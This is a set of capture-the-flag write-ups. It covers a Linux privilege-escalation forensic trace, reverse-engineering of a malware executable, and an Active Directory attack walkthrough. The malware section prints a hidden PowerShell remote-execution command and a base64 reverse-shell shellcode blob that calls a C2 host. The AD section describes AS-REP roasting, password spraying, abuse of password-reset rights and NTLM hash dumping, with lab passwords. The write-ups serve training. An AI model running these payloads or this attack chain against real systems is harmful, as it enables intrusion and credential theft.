31 | At this point, we can infer that there might be a description file within the extracted directory. Once the build process was complete, the attacker executed a binary called evil.
32 |
33 | To proceed, we can use the -p parameter to list all process IDs (PIDs). Since we're particularly interested in anything related to the "evil" binary, we will use the `grep` command to filter out unnecessary information.
34 |
35 | The result we get is:
36 |
37 | 
38 |
39 | We can see that the PID of the binary is *829992*, running from the */home/sosuke_aizen/evil/evil* path at 20:27:17. Additionally, we can observe that the attacker executed the evil file using `./evil` and then verified if they had gained root access by running the `whoami` command.
40 |
41 | 
42 |
43 | It seems even the mighty Sōsuke Aizen, the genius who once transcended the boundaries of Shinigami and Hollow, was outwitted in the cyber realm. How the tables have turned! Is this mysterious hacker the next Ichigo Kurosaki? In this digital battle, the lines between the real world and the spiritual realm blur, leaving us to wonder—has Aizen found his true match in this realm?
44 |
45 | Only the Soul King knows.
46 |
47 | 
48 |
49 |
50 |
--------------------------------------------------------------------------------
/Who Am I/Writeups/C8 - In Quest for Rogue Dragon/Images/image 1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C8 - In Quest for Rogue Dragon/Images/image 1.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C8 - In Quest for Rogue Dragon/Images/image 10.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C8 - In Quest for Rogue Dragon/Images/image 10.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C8 - In Quest for Rogue Dragon/Images/image 11.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C8 - In Quest for Rogue Dragon/Images/image 11.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C8 - In Quest for Rogue Dragon/Images/image 2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C8 - In Quest for Rogue Dragon/Images/image 2.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C8 - In Quest for Rogue Dragon/Images/image 3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C8 - In Quest for Rogue Dragon/Images/image 3.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C8 - In Quest for Rogue Dragon/Images/image 4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C8 - In Quest for Rogue Dragon/Images/image 4.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C8 - In Quest for Rogue Dragon/Images/image 5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C8 - In Quest for Rogue Dragon/Images/image 5.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C8 - In Quest for Rogue Dragon/Images/image 6.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C8 - In Quest for Rogue Dragon/Images/image 6.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C8 - In Quest for Rogue Dragon/Images/image 7.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C8 - In Quest for Rogue Dragon/Images/image 7.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C8 - In Quest for Rogue Dragon/Images/image 8.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C8 - In Quest for Rogue Dragon/Images/image 8.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C8 - In Quest for Rogue Dragon/Images/image 9.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C8 - In Quest for Rogue Dragon/Images/image 9.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C8 - In Quest for Rogue Dragon/Images/image.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C8 - In Quest for Rogue Dragon/Images/image.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C8 - In Quest for Rogue Dragon/Images/imageee.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C8 - In Quest for Rogue Dragon/Images/imageee.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C8 - In Quest for Rogue Dragon/README.md:
--------------------------------------------------------------------------------
1 | # In Quest for Rogue Dragon
2 |
3 | *A rogue dragon has invaded Isle of Berk. As a Dragon Rider, you must uncover the hidden registry key—the secret to taming this beast. Follow the trail like Hiccup and Toothless chasing the Bewilderbeast, uncovering the attacker’s lair. Can you tame this dragon before it burns everything down? The fate of Berk rests in your hands, help Hiccup in this adventure!*
4 |
5 | 
6 |
7 | 1. Crack the executable and observe what value crawler-point registry key is equal to (registry key path is HKLM\SOFTWARE\crawler-ctf\configuration which can be obtained from the executable).
8 |
9 | 2. This is the pastebin endpoint. Follow the redirection and observe which C2 server this executable is connecting to.
--------------------------------------------------------------------------------
/Who Am I/Writeups/C8 - In Quest for Rogue Dragon/Writeup.md:
--------------------------------------------------------------------------------
1 | # In Quest For Rogue Dragon
2 |
3 | When loading **rev.exe** into the IDA debugger and viewing its pseudocode, we observe that the executable reads from a registry key and performs some form of comparison. This behavior suggests that the malware may be validating system-specific data, potentially as a way to ensure it is running in the desired environment.
4 |
5 | 
6 |
7 | To investigate further, we can set a breakpoint on the registry query function and inspect which registry key is being accessed. By doing this, we can uncover the specific details that the malware is using to tailor its behavior to the victim’s system.
8 |
9 | 
10 |
11 | 
12 |
13 | Upon closer inspection, it becomes evident that the variable `a3` is being used as an XOR key, which is critical for decrypting the encoded data used by the malware.
14 |
15 | 
16 |
17 | 
18 |
19 | 
20 |
21 | Continuing the analysis, we notice that the value stored in the ECX register equals **0x12**. This value is used as part of the encryption process. The malware then base64 encodes the result and compares it to the hardcoded value `PWthVSBaISZ7`, which we suspect is a crucial part of its logic.
22 | Our next step is to decode this base64 string and decrypt the XOR-encrypted data using the key **0x12**.
23 |
24 | 
25 |
26 | The decoded value reveals the answer to the first question: `/ysG2H34i`.
27 |
28 | This string points us to a PasteBin endpoint, which the malware uses to retrieve additional payloads or commands. By following the link, we can gather further details about the attack and potentially uncover the final objective of the malware.
29 |
30 | 
31 |
32 | Upon visiting the endpoint, we find that it hosts a PowerShell script named **icsd.ps1**, which contains malicious code designed to establish persistence or gain further access to the compromised system.
33 |
34 | ```
35 | https://github.com/HuseynAghazada/for-ctf/blob/main/icsd.ps1
36 | ```
37 |
38 | The PowerShell script attempts to execute the following command, where a password is passed as a plain string, and credentials are created to execute the attack:
39 |
40 | ```
41 | powershell.exe -nop -w hidden -c $pass=ConvertTo-SecureString -string 'REDACTED' -asPlainText -force;$creds=new-object -typename System.Management.Automation.PSCredential -argumentlist 'ICSD\bertholdt.hover',$pass;$ResultList=@();$iplist='10.100.11.250';foreach($ip in $iplist){$Resultlist += [System.Net.Dns]::GetHostbyAddress($ip).HostName};Invoke-Command -AsJob -ComputerName $ResultList -ScriptBlock { cmd.exe /c start powershell.exe -nop -w hidden -noni -e --REDACTED-- } -Credential $creds;Sleep 20;
42 | ```
43 |
44 | The script establishes a reverse shell, and by passing the list of IP addresses, the attacker can control the machine remotely. The command uses a hidden window to avoid detection, making it even more challenging for the victim to realize they’ve been compromised.
45 |
46 | Next, we proceed to decode the second part of the attack.
47 |
48 | 
49 |
50 | We discover another base64-encoded string, which is also compressed. This data likely contains further payloads or instructions for the malware to execute.
51 |
52 | 
53 |
54 | This compressed data contains shellcode, which is then decoded and executed by the malware.
55 |
56 | ```
57 | [Byte[]]$gNu7Y = [System.Convert]::FromBase64String("/EiD5PDowAAAAEFRQVBSUVZIMdJlSItSYEiLUhhIi1IgSItyUEgPt0pKTTHJSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQjxIAdCLgIgAAABIhcB0Z0gB0FCLSBhEi0AgSQHQ41ZI/8lBizSISAHWTTHJSDHArEHByQ1BAcE44HXxTANMJAhFOdF12FhEi0AkSQHQZkGLDEhEi0AcSQHQQYsEiEgB0EFYQVheWVpBWEFZQVpIg+wgQVL/4FhBWVpIixLpV////11JvndzMl8zMgAAQVZJieZIgeygAQAASYnlSbwCAB/1rBoarEFUSYnkTInxQbpMdyYH/9VMiepoAQEAAFlBuimAawD/1VBQTTHJTTHASP/ASInCSP/ASInBQbrqD9/g/9VIicdqEEFYTIniSIn5QbqZpXRh/9VIgcRAAgAASbhjbWQAAAAAAEFQQVBIieJXV1dNMcBqDVlBUOL8ZsdEJFQBAUiNRCQYxgBoSInmVlBBUEFQQVBJ/8BBUEn/yE2JwUyJwUG6ecw/hv/VSDHSSP/Kiw5BugiHHWD/1bvwtaJWQbqmlb2d/9VIg8QoPAZ8CoD74HUFu0cTcm9qAFlBidr/1Q==")
58 | ```
59 |
60 | Our goal now is to retrieve the command-and-control (C2) server’s IP address and port.
61 |
62 | 
63 |
64 | By debugging this shellcode with Ghidra, we can uncover the C2 server’s details. This will allow us to trace where the commands are being sent from and potentially stop the malware’s communication with the attacker.
65 |
66 | 
67 |
68 | The IP address and port used by the C2 server are **`172.26.26.172:8181`**, providing us with the final clue needed to understand the scope of the attack and begin mitigation efforts.
--------------------------------------------------------------------------------
/Who Am I/Writeups/C8 - In Quest for Rogue Dragon/rev.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C8 - In Quest for Rogue Dragon/rev.exe
--------------------------------------------------------------------------------
/Who Am I/Writeups/C9 - End of Rumbling/README.md:
--------------------------------------------------------------------------------
1 | **C9 - End of Rumbling**
2 | *The fate of humanity is in your hands. The Rumbling is ending, and only the chosen one can bring peace or destruction. Uncover the hidden flags, symbols of hope, and decide the outcome of the race for ehumanity.*
3 |
4 | 
5 |
--------------------------------------------------------------------------------
/Who Am I/Writeups/C9 - End of Rumbling/images/esasimage.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C9 - End of Rumbling/images/esasimage.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C9 - End of Rumbling/images/image 1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C9 - End of Rumbling/images/image 1.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C9 - End of Rumbling/images/image 10.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C9 - End of Rumbling/images/image 10.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C9 - End of Rumbling/images/image 11.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C9 - End of Rumbling/images/image 11.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C9 - End of Rumbling/images/image 12.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C9 - End of Rumbling/images/image 12.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C9 - End of Rumbling/images/image 13.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C9 - End of Rumbling/images/image 13.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C9 - End of Rumbling/images/image 14.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C9 - End of Rumbling/images/image 14.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C9 - End of Rumbling/images/image 15.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C9 - End of Rumbling/images/image 15.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C9 - End of Rumbling/images/image 16.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C9 - End of Rumbling/images/image 16.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C9 - End of Rumbling/images/image 17.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C9 - End of Rumbling/images/image 17.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C9 - End of Rumbling/images/image 18.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C9 - End of Rumbling/images/image 18.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C9 - End of Rumbling/images/image 19.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C9 - End of Rumbling/images/image 19.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C9 - End of Rumbling/images/image 2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C9 - End of Rumbling/images/image 2.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C9 - End of Rumbling/images/image 20.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C9 - End of Rumbling/images/image 20.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C9 - End of Rumbling/images/image 21.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C9 - End of Rumbling/images/image 21.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C9 - End of Rumbling/images/image 3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C9 - End of Rumbling/images/image 3.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C9 - End of Rumbling/images/image 4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C9 - End of Rumbling/images/image 4.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C9 - End of Rumbling/images/image 5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C9 - End of Rumbling/images/image 5.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C9 - End of Rumbling/images/image 6.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C9 - End of Rumbling/images/image 6.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C9 - End of Rumbling/images/image 7.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C9 - End of Rumbling/images/image 7.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C9 - End of Rumbling/images/image 8.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C9 - End of Rumbling/images/image 8.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C9 - End of Rumbling/images/image 9.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C9 - End of Rumbling/images/image 9.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C9 - End of Rumbling/images/image.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C9 - End of Rumbling/images/image.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C9 - End of Rumbling/writeup.md:
--------------------------------------------------------------------------------
1 | # C9 - End of Rumbling
2 |
3 | In the task need to get hidden flags during the attack. First we did an nmap scan:
4 |
5 | 
6 |
7 | It seems the machine is domain controller and it is inside `icsd.local` domain. Through the hint, it seems `armin.arlert` is a domain user. Nmap has krb5-enum-users.nse script that can help us to discover potential valid users.
8 |
9 | 
10 |
11 | Checking through impacket’s get np users, we can see that this user is ASREP roastable. After cracking this user’s hash, the password ocean is obtained.
12 |
13 | 
14 |
15 | 
16 |
17 | Let’s search for all AD users using `crackmapexec` tool and create a list for them.
18 |
19 | 
20 |
21 | It seems the user Connie has the password ‘Br4tSumm3r’. According to Connie’s description, it is obvious that the user Jean has the same problem. Password spraying gives us that Jean has the same password as Connie.
22 |
23 | 
24 |
25 | 
26 |
27 | Jean user has read access to “Secret Mission” share. This share contains credentials for the user levi.
28 |
29 | 
30 |
31 | 
32 |
33 | Let’s use BloodHound:
34 |
35 | 
36 |
37 | 
38 |
39 | we analized executable with ghidra and there was encoded credential
40 |
41 | 
42 |
43 | Upon analyzing the data with BloodHound, we identified that Levi has **ForceChangePassword** delegation over **Zeke**. This means Levi can change Zeke’s password without knowing the current one.
44 |
45 | 
46 |
47 | We used this delegation privilege to change Zeke's password and log in as him.
48 |
49 | 
50 |
51 | Interestingly, Zeke had **GenericAll** privileges over **Reiner**, which allowed us to change Reiner's password as well. This opened up further access to the system.
52 |
53 | 
54 |
55 | so we again used it to change password.
56 |
57 | 
58 |
59 | Further investigation into history data revealed that **Mikasa's** password had been leaked. Using her credentials, we gained access and found a **pcap** file, which we promptly downloaded for analysis.
60 |
61 | 
62 |
63 | When we login as Mikasa, we found a pcap file. We download this pcap file.
64 |
65 | 
66 |
67 | We started to analyze the file by tshark
68 |
69 | 
70 |
71 | The analysis revealed several keyboard events, which, when decoded, provided **Eren's** password. This discovery was crucial as Eren's credentials would lead us closer to the final objective.
72 |
73 | [https://gist.github.com/MightyPork/6da26e382a7ad91b5496ee55fdc73db2](https://gist.github.com/MightyPork/6da26e382a7ad91b5496ee55fdc73db2)
74 |
75 | 
76 |
77 | We decoded the following keypress events to uncover the password:
78 |
79 | ```jsx
80 | 0000130000000000 -> 0x13 -> p
81 | 0000040000000000 -> 0x04 -> a
82 | 0000160000000000 -> 0x16 -> s
83 | 0000160000000000 -> 0x16 -> s
84 | 00002c0000000000 -> 0x2C -> (SPACE)
85 | 00000c0000000000 -> 0x0C -> i
86 | 0000160000000000 -> 0x16 -> s
87 | 00002c0000000000 -> 0x2C -> (SPACE)
88 | 0000170000000000 -> 0x17 -> t
89 | 0000210000000000 -> 0x21 -> 4
90 | 0000170000000000 -> 0x17 -> t
91 | 0000210000000000 -> 0x21 -> 4
92 | 00000e0000000000 -> 0x0E -> k
93 | 0000210000000000 -> 0x21 -> 4
94 | 0000200000000000 -> 0x20 -> 3
95 | 0000370000000000 -> 0x37 -> .
96 | 0000280000000000 -> 0x28 -> (ENTER)
97 | ```
98 |
99 | We used **impacket** to dump the NTLM hashes.
100 |
101 | 
102 |
103 | Finally, using the administrator’s credentials, we logged into the system and completed the final task.
104 |
105 | 
--------------------------------------------------------------------------------